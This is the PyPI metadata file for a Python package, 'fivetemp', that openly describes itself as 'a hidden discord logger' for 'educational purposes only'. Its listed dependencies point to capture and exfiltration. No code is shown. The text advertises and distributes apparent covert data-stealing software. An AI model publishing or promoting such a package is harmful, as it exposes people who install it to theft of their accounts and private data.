Metadata-Version: 2.1
Name: fivetemp
Version: 1.0.9
Summary: A hidden discord logger. Open for feature requests. discord.gg/zUjRjbJS educational purposes only. Added more logged info, credits to reckedpr. Encryption Update. Fix Release 6
Home-page: https://pypi.org/project/fivetemp/
Author: Abyzms
Author-email: abyzms0@gmail.com
Classifier: Programming Language :: Python :: 3
Classifier: License :: OSI Approved :: MIT License
Classifier: Operating System :: OS Independent
License-File: LICENSE
Requires-Dist: requests
Requires-Dist: rgbprint
Requires-Dist: pycryptodome
Requires-Dist: flask
Requires-Dist: opencv-python
Requires-Dist: pyautogui
